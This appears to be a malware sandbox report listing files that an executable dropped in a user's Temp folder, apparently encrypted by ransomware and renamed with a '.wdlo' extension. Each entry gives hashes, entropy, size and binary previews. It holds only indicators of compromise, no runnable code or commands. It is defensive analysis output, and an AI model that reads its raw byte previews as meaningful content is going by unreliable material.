                  SHA-512:E5405C90FEF26C916C7C97058E52DA9EEAD34140DB3B6ED7604063DD305088A8B9F49F4CE69B48E0F208B6F87D4880D50CAEEC88AE4C275FA43AF25343E13015
                  Malicious:true
                  Preview:..T.i.}..tw1^....}t..........'...O....ynr.`..>..q....uhg.V....Lth.>o......j......+.....|l..\.....H!j.9u.U..m......5.d.1.bZ..r...8.b.K.(\...~.\.n...^....uch%.a.......A...=......=.l.....d%...w.6...'..E....T...88...J.U.x......X3.['.&?..,.y....z..)D..s..E.5.9.R!..U.....V.....h....m..r.d....im.+.$i.(....GD.2T..5..(.....A....;.L.pY.......n.B......W...hG*.\E.XM.fP....X..L._.....^...........?.%=.gW..v.)q...!B.;.j.1.Q..t...K......cT..h.Ai....8~K.e...9O/../....7.l.vRe.....F...kV.Zv.VB.*..T)*.f.?.=i}.3..nc..........-j.h..1.oiF..}..luk.S*!.Y..^L..J.b.=.G.n^,..3.. ...-.......Q..&..G..r.i...M.xc.9./.#....0...F..f.fic...%.&.B.h.G-:......G:.O.!m...j.......A........NTm.d.........w....t..._.g....+..=.J..?GX...XU.:.e~Wt.l...VP....x..4..[....A..z.R.g...M...0^{........Ei.a.Bj..O....#..A1..X.._..U`........A........%.-...7~*R.h..Q...nj..Z...w......... ..?.Y..F3t.m.py.5jH.s`.....3._._H|~1.O..W..R.kk$...).V...v..QsF....r........IH.*$.`(/...#..p;.....(.....\QCA'..9.o..

                  C:\Users\jones\Local Settings\Temp\DESKTOP-AGET0TR-20231003-1305.log.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):395914
                  Entropy (8bit):6.098834636098755
                  Encrypted:false
                  SSDEEP:6144:N9P1SSRDVBaU/lFGXelpCw76dRS9z3PQ3O:rP1LDjN1XCwJ3Y3O
                  MD5:99BA92126B175214C20F4D5C709123BC
                  SHA1:BB6476088A28FD31A771C49C40DD3F7D76DC6E17
                  SHA-256:9B8B9AA44375AB4DE8F0824E6DE835B79580F08A53D6E9D0C4955E5EDBA2A71A
                  SHA-512:B59E5DBB3A70D149DC433018D8B27E12F767EB37DD570BA58BB01EEE1FD99112ECE0B05CCFEF5934ABE71FAA2CAE809B27B0017B6A3065CF92842374EF74AB7C
                  Malicious:false
                  Preview:..T.iu.k.,r..K.%.+U.G.A.5y<i]..%..w$p...z.YP.a,..u0....&...,pQk..?....Tt8.-.~I.h..{Jx?.ti....a;.DU.5...FI')KJ..+.."....=.D...5.g.Q..0.4-.dz.A!...N.\.........*...J..l........C..e.N.,.6.Q.........SR.m.n..4...$../.....<...U.K..`+...E.."...Xg.E?/....g.&.d\....._...~.....F.$...w.fr..!aW...6)..C...C.&F.!..{y.)p.(k..x.Cg.y......'..D..>.b...XmIC.....S.:..........%[.....LR.:......v.......W.K...,...1.-.......6iM..}..".$.m.L..!OE.M..).(.+....$...^7.@...o.f. J.d....7...K.nM..#.]..w.\..4.9O....7..L.C....g..N.j..t..%..i,~..il...Ce..y=!1.E..Qg. ....S6..A.k........D-.!.[s.....C..r..Y?.....S.?........Ln.F.X...yg.".FY..Ox[..$I....q.5...Sr.... ;..;5:.oR..q.E./8.....f..7.M.s5.......T.....].Z.z.C./.:H3....~.0...!..8.-.X@.EY.C...>..."m...D........s.{....IS=.0.......m..,.*...&.j..7.#..M.L....s...[$.L....X..[.z.6....r_'+.;..o.>}Yb....J<(.L...........KQ..^.z..\.h@...V' )z..7.N.q....X..i;.e.k..]!....r...s..../....{....yjEo...g]...qN.v/.E.^k..X...pnT)....J..p7{bE.

                  C:\Users\jones\Local Settings\Temp\DESKTOP-AGET0TR-20231003-1309.log.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):138356
                  Entropy (8bit):7.998814847468252
                  Encrypted:true
                  SSDEEP:3072:arGpajnjkvkpyhBQha8bo3p4FstKjAKKziU1t30trIqfYBbCmy:Mnjkvk6OaSGWR0KKia3srIqsG
                  MD5:B2842EA1AB9704A15D263C30D7BE8E2F
                  SHA1:483136DD651B26D8E5F1F4F747B06A82D553F2CD
                  SHA-256:A61B3688D3E53D24918115A317AF8D34BD09ED511216E8ABED830D90B1E7951F
                  SHA-512:5A6EDEDE074E3B7258E45CF4EED3DC41D51B35713AAE6CF1967B6D9C807FE844DC4425AF1362B28043D542BD5B5510E575BA0B491B98186FC771D20C50E9BABA
                  Malicious:true
                  Preview:..T.i&...7.[...}4g;..c...3....GQm<.....|.........m.q.i....!.,^@....L.....5...1.....r).Q...b.w..Q`9.E,....E%r...1I.n.m{(..F..O?.p.......z..T.W.k....L}.#[.gH.........%.<......mS..D.p..!Tw.p<......_...........?.t>X...y}.^.r;.BT.....'....=b.%2L.F(......g.dA7..3pB1@N.P.&......S..?...(8..I..s..$S...../...i...V...1.....k+..f2.1w.#.......@/*.en&...{..T..JA8:.M.l3A.?7../...~..j%...........D..n..U3.{.<`V6..pf....\..X..t...#..C...&.^..b.T-...t=..6..m..3.,.1..........@.7.7...........b.+...X&*.....N....N.:..Lx,....gRj-Qz...|5=.G.&K..C.g..X..=.......15...2......w..z.....4..z..;w..5...[1.=..GT..m[?....M...`C.Az....>)*[..p...v..(9j."....05\a...g...eE?...t[..*..X._.)./.e.A\...[.Ewv...GO?.HK~,m..*64>..w.Z.:.C.X..o...&l...F.h.[.C.p~....7.C."..G$..p...`.w...~d.XI......vW.e......2.......z.>g.K......K.t..v.>..u..x.p.......8..=..jSP-.......lh..89.H...4.!o|.g|....{......z@+.c.fN<Vj..4 =......-.O..)..O.m.r/).@.>}.%...5....(Ha@7.E...Z.b.$v...)..g.......J.9....9.=..

                  C:\Users\jones\Local Settings\Temp\DESKTOP-AGET0TR-20231004-0929.log.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):9798
                  Entropy (8bit):7.977354757266449
                  Encrypted:false
                  SSDEEP:192:3I4Wuo4SOvw6aVJrsem8UKisAxBTiemey8MOCo3Ce/:BWpb/3fw5rxBTieXy8NCe/
                  MD5:0C056CD2DFC1B398647255EEA00D17C4
                  SHA1:11036E557F84B44EC19EDDD0939A31F303D9D3DD
                  SHA-256:5517AE6D1A703F4D8F8DE31ED97BE58E35D4E72A30C86AA674A1B0A38100BF42
                  SHA-512:E6F4E3631810285AE3DD8575EDA07569E5C90B416B8A97A7B10A18168E9E22AD1032891E972D34E6459B1972C233E0C54E6882D7136D76547FA9191AFD6E2A62
                  Malicious:false
                  Preview:..T.i..d...Oj...f.wV..<G.P!.|..^..$;h...FJDy.....{..k$.6.}...v..h...0 .~...)...:}...*...17(..vg...!j..$.....M|........3=g.....L....J_...wz...6.P..$x^y/.....o..DW.]M+.(....`.l.=.....N.(..;g..~.........u.2g.x..p..8:~b..(|w.....0...u.....b..h...gqMI.&.@l`.y....H)9....G.1G...U.........$.].W1.&....Q.(nw2o.t.......<.R...^.S[..6+......H])/.Z... y..,-..;....$.'......u.*.S...1.....T.C..j.H.%Y...H5.7O.i.xo6i........h...q....[.q1K....R.T....2...'P.."E..)3F.$..!.X]...U....9..W.?...../(.g|L.~rRH&.@.$..d.M,...DU.....N....g.8......;..(....iEo.V...g....+..W?....`...[F..Y=...7.d.........V.8`...q....:)m....0K{|A..\88=,.....=...vP..m=..1.9....A...7.%.. .B7nN..."..$....&.#.i.....E.....HW..^a.M...1..?....J.b...p.8......i..L....K...0.*.J,..T.f..T..*.$.0N("`*...K)T...2=.....x......_....0...~...j.>..T.,p'.DT.2A.8..U...\.7....[..,.:.d.o..C...]h.ddN....F..g.qf%...v[fH.{I....%.eKn%........p5b.V......9."S.t...".....Y4x;n...8....<....{?...a]\C...Q....k..

                  C:\Users\jones\Local Settings\Temp\DESKTOP-AGET0TR-20231004-0929a.log.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):58820
                  Entropy (8bit):7.99752330719469
                  Encrypted:true
                  SSDEEP:1536:lmnTUmd/2G6S5CMzUOF3DmZrWgf0asfwlU1XuG0o6iGsA:mTX2G6I3z/yZZkYlU1IP
                  MD5:AC0FA0774D3D959DCA28C7556D68A319
                  SHA1:53C37DA85517A583F3DEA736AA2DA657BA8A5B47
                  SHA-256:83098D4529D11821F2A2F0202B98179D6BFE46E7707862BDFA226C2073ED29F0
                  SHA-512:3F86A55AF7A08FA34DED1A2914E5CDC1F2424FA7CD2E4AA7379CBE0CAB93E2FDA9874E8DA9425616FBF4A98367793E94C15304FC9D274DB2E814E1DC7A9A6608
                  Malicious:true
                  Preview:..T.iwr.q...f.#..y.........H.\......oE.....}.'..x.Q_..9..Q.2N..&.l<)36.Z.O...z...EpW..|9....c...wu.?.n$_..2/;..AdJA..k.((e...x..aa..l...?P.W.pd-x..J...g.f."Ow...a.]....2Jw...O....-..V.@. ...[zY...=..].|...8.D....A......8Sat."v....5..nR...G...Q`..r1.......u.Q.f@...\.....q.... ...4..`... ..H2.D.X...:...\.....KI.l.z..w=..Z.........k..P.E.WiN\a..s.....C..is..4...'1.2.<.>.....'3.... M.J....s...q7..z.R.Y...o....1.i..8...W)y{0...2.|F(.O8......E...$x}^...5...i+.+..#.{.!.Iz...`HaL."....aA.....[*.S.........",._"...f...'.@zQE$.q.....M..'..k4|y.l;..."...wk.Xw.......tD.Cp.\m...7....}.S.IyY"..a.Y.4M c.....!&6.g._....N.T........T.HA...4.WI|\...G....(.\UQ.).i.D...:E...C.&..3.Ul.T.K.......QF@l.E9y.>d..].6.....n..;..`>N..2.Q.)Q.....vz,'.?I.TO.`2JKA.'...H3.H...a......b....j..n.Cg..%.F-.....OE.....v........EZ...N`.. ..;...M...J\O.A.... $.&.....mq)..s....;V.u.........F...B..v.,g.M.}y.....I...M..~...m../..u.C.'....z\/*6.$|(.Q.(h.k.n .$F'...."....w....`.QZ.W.z.

                  C:\Users\jones\Local Settings\Temp\DESKTOP-AGET0TR-20231004-0929b.log.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):112686
                  Entropy (8bit):7.998425728503279
                  Encrypted:true
                  SSDEEP:3072:lKuN5fAmDJexoG1NBaywmFiRbA98Lb+2/P+W:zFEoe9wl8aS2n7
                  MD5:905CDAAC408A194C6D68502254A33434
                  SHA1:CCCB7101BE387D13B23DF70CEF1FE690EEC84E73
                  SHA-256:32AAA85EAF5D451E0992D3703AA51D1D9C4ED0F1E517D7811AC6F78049674992
                  SHA-512:7D69E31030C2AC26C65F22AF3F075287059E8FB876377AF57FBDC5563FF5686E57CD48CAC4C4E47C0B82D7772947D09B215B6EE1EB1A3B23CD6C82D487998A36
                  Malicious:true
                  Preview:..T.i6.,......2...v .L...=.\.....".V..;|.dR....'.....(..z`....]F..U.h.t...... Ya..........P....h..[.u{...P5Ae8.B.%.D...>.<.JayI.....A..f..[t.Qi.`2-.E..8..V-...f..H.8.L.g..D...H.....w.5\...L\.....J.?.@.V@w..&..............o.C..........El_.#m.....@$........c..#..F..&{...*-v.`"Q....+../.^.B.r..b.p..hg.b...^V.3.[Ub....62.j.9.O.O2W.3. z..-.....e..e.4a.."1.^.m....3..Xp.7.|%u.E..O..e.2.K.4...2w8..J.v.4.%;...otg.!.......-..=..nQ..W.P<F~.X_..E.m...-P.P..N..4.(:j..|....bw>....-l...p.J.X.8-,...... ...@...YS.o(.....X.!Wd%i.dB..*......$r..&..,.^.wxLw.c....BxA..bl.O.'..lk..kLp.5S..v%.J%...+#.vt.}.N.j..H...DW..x*O....4.O,....SR.@8.&.....F%6ndjXX...a1(..L.8...P.>~...y..$....wj<*v.. .Np....O8.5......e....)..i...........K'...D._.q:6..2)A.S_7....J.....B8...+7.5t..Qd.P...y+)g...;k4.m.7.|XD.+..I.`Y......<qh]d....1.Q..Rq.......Ng.w.6%.9....$i...Ve..t...~..e.|....,.M.....z...p....4.#.6...=*...N:N.;....t.........v..z.L..+.e..:...~#.nSN......d.?.......

                  C:\Users\jones\Local Settings\Temp\DESKTOP-AGET0TR-20231004-0929c.log.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):7696
                  Entropy (8bit):7.975403233049522
                  Encrypted:false
                  SSDEEP:192:fbhPMZd5YFk/sy9Tsj18/Kx4YTUJT7thd/j0:ftPEyFkUy9TsjS/Kx4YTKY
                  MD5:F5122BA82FE710EDCD3B3FC603C4BBC6
                  SHA1:953BF118EA79722DFDA05AD8E972A35895ED013F
                  SHA-256:92C676478DB05CC2F15D24559858743032A7D2B1CFE1383A2E1C93987256C207
                  SHA-512:8E2A3E49AD3D28C518A4168D35E42FD8F0827874C37CA3674B091B8483332C54477E0027298EE71E5B45D194BA2C3101973F35929E1E4CDD5660F4C7618D6B52
                  Malicious:false
                  Preview:..T.iKY..c2jau*R...H..|....oI..lf..6..+[..B4..%.i.E.~7.y.....c.m..y'...=..h..q<....#ch.A........L\.=.u.Ye.3...$....dx........D..8.]E'...o)...b..hn.. _b.Ju.+!M..R.zk...2.q.s..?..}../.%[f....5.s9...U_"..............^..[+.#<.'.j.]..T.{..........6..M.bS.......)3....I..-/...(%1..V.p.h....D...F.F......hH.:lt.e..t.K..b.gSg4..;.6.}{..^.wkc.JI$.u...UG\=.#....$,...o'$....0gTG.`..A3^.H`.,*j_.........D...-.e... E!.(-1.PZq...;.sR..c.....v.M.^....Vo...H.6.7J@d.....BU........k...Y.u1/..U.ct.0....7.m...%..W.....r...a..>f.`;...nD.z.{.J{....n.O..w.}6(D.WX.Z........q......y..p..Q.....7....`..Nb.&$T... +....E7..jx.[1...s....K.CS...=|..%x.Y...*....^a.N.....MI3..u~3....).XQ..Yw......V..%)g:.......#.?..X.:i...=M....'.5...)J..t..F.=.-o.c.LS.And...'..=.e..fu.|.b,....d.t!.M..(.a....UC..s.D.0..i...$.O.AD.~1...j.I.-..... 1f#.e`UWe.L......A....O..... .?....?.S.9r....Q.R.>.......?..|y..h..fF......C.."C=M....7cw..w.K.$..........c...+...+#../Y.k.:

                  C:\Users\jones\Local Settings\Temp\DESKTOP-AGET0TR-20231004-1000.log.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):40082
                  Entropy (8bit):7.995925053931594
                  Encrypted:true
                  SSDEEP:768:5YzdPD25/TvglKHfqVRdEqC2mBpQcDAC7CtC8b+PO6:5+dL25rgA/Ew5QYCtC8b+PO6
                  MD5:F9D117853EB89B5020A09647B0591D48
                  SHA1:501DB1ABB6B0BD5B37BFEF2C2B951846DD289086
                  SHA-256:495E4A17DFF3A40B1D53EAE8423AD4B7030AF69A56EA6B2F1162AE73A36839D3
                  SHA-512:6F6977B25419FF0FC1C4D9295784E31B7A32D852F8F3A0545F481A56653C5A94108449A2700BFBE53117903745A7ED18F3B2784B9C0B5B1AF751FA9476A545CC
                  Malicious:true
                  Preview:..T.i..36&.".0.a....g...".Nq..5....>.#3.:.D)..)....2!.C.K.3....W.k.g.U...w..-@E.W..*..;....F..t....?.%.z.;..D ...#.[...b...Kdv.Yk4....N.......".W+.T.V.K....$'.....{..~...j..V..d/.n.7\"l.Ah.{.,.{....d..4...'NkD.>.(.",........J/x...c./_..i.,{m.gU..VJ.....6....I S.W..o.fV.:v.b.G.=".+..P#..7..........8.v..-\.y..G#{\.7......m.wc..LXQ....8...r?.I.!.. .o~6.$..oAl.U.}....,^..q..._........+...9.r..v......./.."......0}....zTD.x."F).3Q..`.....m.$e....D./.3..%...D@E..o..._y.....H.%...w............|.{.u-.l.U....tK~.^.br.N^.D......Em..'...K...Z1..p.dWm...o.s.-....dx.>.(...@.m...z.P..*.z'.0....CV....._..."..B...T-.O....%t.C(...V.\.$as#..g."3.6<v..i...?Fs...{.Z..S.}ze.7~BP{.WB.sC..../.W.MO5;....X.&A..........{.........O%z.........-.^a4.}.i.)M..wzW\.X./.U.-R..'......B\.y..nk.%..F..S>.M.r.....t.R...H.Q..h.k..w.N..t6(.@..,b..:.....d8...X...H.J..0...F.....v?.,...B....H}._M.Y.8'.r...#...N....'U$.0.....b.....y..1y..?...j...w..M.)......vO.....%..Z.].....gE;.

                  C:\Users\jones\Local Settings\Temp\acrobat_sbx\acroNGLLog.txt.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):18241
                  Entropy (8bit):7.989391019560409
                  Encrypted:false
                  SSDEEP:384:pf4Gprxpoc2HDWMfcCv2DMalewC4v6qXFD/AqKz55XjjgxZJE8u:JdpVpoc1CNGUoXFDYd5dj0JE8u
                  MD5:EA5DB2145BEEA37D1A0A4D6B6926CBAA
                  SHA1:3F40E21ABCCCDDB9D67B01A7CCF2DB5730E48C29
                  SHA-256:03F69C1786B865A1D24E75BC66F25E05DE0D495153FCA30E503FADF1D3AB58AA
                  SHA-512:5085A753138DE88073DD2ABF40644A75C22B6D39E473FF4ACA1B558BC4A14E095B16722DFA075EE9735910C0B39631F042E7847853C2ABE74F617A7BEADC07A7
                  Malicious:false
                  Preview:03-10R....M..X....(.l.&}.....mc......r.....L|E........p.i.]MY...*.Mk...y.a..Wi{......d.....b.........=..b.7.8!.<+.EH....J.3..7K..0C_.4...$t`;...U.hoi.\#.ycB=+....#7.<..v..Jg....N_~..a1kK5......Z....;/6R..@..J..*N..M...c6.....$.......V...X~.4.1.@....*........T..&.a....Z...eG.ug.@.[; 0/..a.P.C.-....c=.;....n..gO...=5@7m#%|...$.=....]!.#...5.d......J(.fe=.*..=..it..H.XtCb...`.....]?%..C....p/..G.b..0....K...........[z....9pDD\R\Er./McW...2..+I.......9......}>..v.8.7.....3\..n..............q..Hfg.%...!L.&..V&...>{.....m..H.m..H9i<.3.`..ARu~..n.E....3c....K.)]...}M@.. #y..&<j.9'8..Dv.7r.)";l...rA~.X1...s.g.{....A><.7.......i.r{.d..K.%P...JM.......Yr.GW.eb..`Q..).p89+p.'.....r...4.....Z...T.E.,..;Q.....Y..Ay..q...;6..V?...W....>H.f....J.f....LD.w..#..v.......j......W-.@xX...B...%..mD..a...hG.._....@...p...`/...T..f..n.2^3l<u..E.L.*5.R..k....Lt.S|...Oe........N........../..F.@......_.......@....3.!...$~_.y.|..SV...q...mNq....wk...6{e.-T.

                  C:\Users\jones\Local Settings\Temp\chrome_installer.log.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):6256
                  Entropy (8bit):7.96617829102435
                  Encrypted:false
                  SSDEEP:192:85tg8FmltBoGlvYSnILpfF8ZheZHUz/VDBcJPNav:85IlkeYSI9fF8ZSUJDBSIv
                  MD5:8214CF79152424DF8470ECE73485544C
                  SHA1:75F266C008654B2A02EC90FBB07AA855BE5BB71F
                  SHA-256:51A6971675DF219279E770B728DED3C1FDBB1F43C67D0688B9C739452C1B4A10
                  SHA-512:8AF9404CC899B8BABB2BC40976AC67C1CFE2F80398E184436E5CA553226012347A676B1419F8C1CCBE8FC8587123FE5478D628153285895241CF3F931D521152
                  Malicious:false
                  Preview:[1003..N.H..w............C7.-....T..... .j...Z......+(...v......h..8Wx.\t{.k.N=.../.qy...x}.=7.[.T...mQ._3j...$b...rY.R^..J...j*9.....m.A....x...?.g..y.4U..zF.".xVm.9}...x.'Z.\....S...N.Wa*@...i<......3=..x..j.......9....`..M.4.3M....6.U...t..|..9/......P*.RQ......l.....F.4\..(..p.g.+0..b.....CY...X.Rg.t..v.N......+8:=U...6.,....0.#....3>.1<.F?;Y..|.`K.. }.g.{....,.V...M............r.......b......|..L..F.U...7.K)N...4|;..2C>.....#U..m.y,FGh...4.fHp...S.G......4.z}..p...I.O.N...v.t..F.t................;6.E%..=&B.:E..4.....:.=".I.....M.;1..D9..Y43.5%u..,D:8y.....*......B\).]..*p.Q..iFr&h.,tZ%h.(....Y....$.G....Cm.C... A..5.d>.7..6...y....lH....{..........g.....d.Sw.4.[Q..HU.0...%e.....1..St.`..ola...ed.&A........S...~?U<#.....{4.-.d.2oK..s...._a.c..G..2..'...J5...'.D+.^..4...."R....K........F..^.V!.....oVZ.-..C..`i....3t(.......F...<[.D7....0v.%...........bD.............)...x..a...YWF.........zo...fS..9.T...[.A.<H!.....J...\..R..L..gQxE..!.p.

                  C:\Users\jones\Local Settings\Temp\hardz.bmp.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):602502
                  Entropy (8bit):3.1758373266802145
                  Encrypted:false
                  SSDEEP:3072:ATAFdAoZaBoTA4XsogSfGp9L32itTfmrLBMWlEepl97x:8ydBaVWsogp9Ko+H1
                  MD5:600C13CCDE20FDA22E58AA1004E1E9FF
                  SHA1:0F8A3B32C8F3860948CC3DF19BE0958ED1269763
                  SHA-256:E6AA8F26ED05C2B3B5709402610A89C01365648050F0D1FD23686E11FA0F5BA9
                  SHA-512:78CB86B7A67B92636DFE1FC0A5E42D70CBFB5D117AF8F7993BDA51196CBC391BD95846CAB1234842827B126F60D662630F12F596C3C9A57761592C448E9F7B9D
                  Malicious:false
                  Preview:BM80..lI[.z1m...6Q.g.[W.z...F].}.n............=.....u9;0d.Q......C..+p....4.N..5..ZE0.H.bP@.....-%7._.HP.7.........s.=.....D...4..8.....p.a5..O7j...."...E.u..anq...jx..b.M.*.'...>.W.I+\i.W.....:e=.\......=..j.e..,..DwaJ.3B_ap....,..j..g./..FfYpFs....r......N.;.mX.../)w+.kIg.y.SE.6.,1...N;w.9Qyw=:..j.uR..CJi.6..O...C..l.:.9r..9g..~_o1`3".F....0.n..8...1..q.p7.G.....".....'dz..1.[z.>L.l..Q.w=.Gu...K+..`.I4.>...s.....g.....LS9....W;L.{.f....eT...u........X..pWe. .x#l...s.(e......uC.. ...@..n.4.......zd...&w.GW........"...;R.....v....-S.o7zV+v...P'..p...k`...=..V.r5.0H..9.8}0.n..^......~H@Ke=..........;..7>^\.>kd....v.%W..<..A..R..\].n...*6../O.....V.x..O.I._r.#....A....?St+S.{..o>.Sn...1.l._....;QXd.q.^2.L9.V'.g.,.t.x...5n..O.e.A.%1p?...O..C._.T...bi.....K.Oc...w..6C..x.......siud...$a.....L!..C.n..D........u.w...8(...Z.(.V8......i...,.>,...A...Q.&.+JE....7b>I.my.........2I:..."..Jw.i.'...C..Ko..O....ui.l...-.!....V.N.....>;0>.v.....).R[5J...\0[

                  C:\Users\jones\Local Settings\Temp\jones.bmp.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):602502
                  Entropy (8bit):3.175234538829617
                  Encrypted:false
                  SSDEEP:3072:d+gCeCl8Bc3RoBnw6mxxk7HjYqqTCTO4hkBkKwSCJZbYMDPWkrsiAuVky:d+q0RuwKzjGKOkkYS0bYMD1gJy
                  MD5:134E3C7D5D0CDAF52EBE1F47057A417D
                  SHA1:F1499EEE586F37E35E722270104D482318CD4F09
                  SHA-256:D1C329529148228E5184C82DB89A0755E6327DE45E96744EB2711B74DF2160FB
                  SHA-512:1BD4CAB361D7013E00FCC02640C955BE0D8F781EDAA58861C84C2AF00D362213844BA0254ED0BBE6016A361446FA86F3566783B0B2D5F327ED8AD566EB0F3090
                  Malicious:false
                  Preview:BM80.....>>r.v2....F. x.X~p.!.. .B.N.....$..B.j........B..W._.!97...cN.Ux....E.......F..".H.;j......2q...O.A....4{Nb>....4F..6.c.9K.........d..|..4..2.Q......[..(*."..[.`.*.m....6u.(..gI...a~..6..0.ML...*.=.Z..]...q...B?...b..!...*..V...QH.J..y8.7.NTl.....s=SD1.....>...a.d....H...g..c.+.......J.!W..p`'.i..,.q..<&....;._.!...'BNW0.....H..a..tc...X2M.H.m,..q....@)..c......w./..+.y...Jc$....F...!a.,.....mG N.@...{.$@.pa.....h...y..HE..d&8.e.1.0.)~$..wk"..9`...@..Z...<.&.k.X..Zv.]3....Y$......>..&.xL=.}...........9.l...8......3....9...U.h.2..c.....y..,-..&_..J'.x.......#Q...A..$.......R....A&...S.Mz:...Q({.....sX."..l....n.`...1.*5.C.V.....;./.yS.`....y)._...Q.f.....Q...@..(<m.q.Ms .dUjO.....`.e/.w.....&.+.Q.<.."...3u.u'M..4.M.~....- {.`.L...>..2Y.Cz>p...O...>..?....5...G?#.{..K*....@fLS.}w..V..}....@@....e<..w.....#......5..q...l..T[.kOkd.X...e........`;...@..X.ag{:(...z8.i...!L?........M...k_...H.m.^8._pY..........}..M.;{...Jo....)...H.8\%......

                  C:\Users\jones\Local Settings\Temp\jusched.log.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):38003
                  Entropy (8bit):7.9952140530676
                  Encrypted:true
                  SSDEEP:768:I+FMAnsZBLr2n2m7Rkx2Ipr0rtoQOG15011mZ5V+9:rFMmCBLUR7Ip7Q5011mZK
                  MD5:BC3ABDC537CE91200C360B85695ED7F0
                  SHA1:525C7405A54F5DCF284D2E3CE649646F09053C22
                  SHA-256:E9203D8D0E0BFA54D807E15D327B1584F66BA0F5262777BE2D6CB76276C25232
                  SHA-512:A6923B19C096ADFA5C390111B65590B90BF82E273767FA0368C1B414CA2E153D6C5230E92DFB4479B400215335AA96E1227A6C8B1BA9A9608318755B84E4CCBE
                  Malicious:true
                  Preview:[2023...(........u.......n...gvE.C.lM8.q4.......N`..}.f`9vG ......,cb[2..1...zk{...Q...2.%3b...bL@.L].8.sW.2.0?.gS..v....sID[.Q.C|.).....p..Q....{.M,..C$w.*T.Q^...A...L.<..............5Z..>..[..uq.^..;...1.y.'Fws........A..C..a.a..u$.d.'.0.N"....]0.)^.l\Q{.b4..H.."lS.m...Q*.|...4.Z..Q.h.Dk...?.ZU.o.y.`.:.pN(......_...6..}.N.*.....(.......{jb...V.?..GT"._..2..C..]...>..I.Z]s..T.....;.C.ipzU.}.....1.lf...= ....!........5...a..(..T(%7......"].....&.x.86.:..Cfu..44......F.^x...<...=."xazm.x.~...5QE..8.....|O[...........9w.b..~I.F._eO.i.}.Lvr.V.E.d0../>....d...&..,.(.mq..N.H.G..B.M....,#...dR!..^#..=..na...l.!cM.."..h....c..@..e..t..\....P..:.!.a#I...QDs.>r.w..dA!/...g...Y&Ml..-w.....U...C.. R..x.]...u.9E.]?:...`J.r......Uv.\....u..].iE..;..:......M.h$.(>...$"......E.!....a5.F*6.v.)....y..(...dEd..6..|g..^....E$2.#..T..dN..Ds3...T.:....q..z.....S,...G.8.W..L.n....Y..QK...+..s....?....<:..,.Y.:.....H...G.Cp......^..B....C.l...=fw.}1...g.M.

                  C:\Users\jones\Local Settings\Temp\msedge_installer.log.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):22093
                  Entropy (8bit):7.991963627359975
                  Encrypted:true
                  SSDEEP:384:iMn35gpQnbXEIYW5IbeFkmgQ7nfjktQAC+HgdSZ8IQdo9r11j0OAsOD:XJguJYAISFkbeJAyR0O
                  MD5:7B9DEC1A16B5C098A50427981E4AD80B
                  SHA1:5F0344BCB89998BFA47626CC9759452E027EA03B
                  SHA-256:D83F640B75569AA8F83CE185091119ACF1DF7C81E10D69B6BDDC991DB0B94A94
                  SHA-512:8D45472438F400D7E9572B822A0800A8B744E80A6E209E4F1876F4F4A3ED473A839C22669B7673D82F1B5EBC2646DFCFAFEE419508A0DF6C7C0069246BD53F39
                  Malicious:true
                  Preview:[4004.....Vvh.....\.]..........B|*..0.)Q.'$..]<.'..F...oL...6.ck..xv......t*..TM.....x....\.g..}.....ht`.@A....3..D..!QK....v1.^...U.....M .6l..!j......?.....\....M.~..^q1g..........*........e&ym.'..#6=OD..p..<..@.8......l..o.".;..5h.m....YP...~.....p.......~Z+........."r..L.h...e.&<..7k...X..{Y..%....l..u.GB......)...() -K.....[8.o.......`c|.l....k...Jn.S9/..p*.Q.I.t.xw ...}...+.O.s".........k..+.....~.b.#....!..4.&f...c\M..s....y......O.P..o.H..h.yj,..8=.X..[.i["....*.f...Vq97...........j...........K.G]CS...\.p..F.2$....5.U..od..w.}Y.LeA..a.#.w$...h..._:}.)..%.'Y 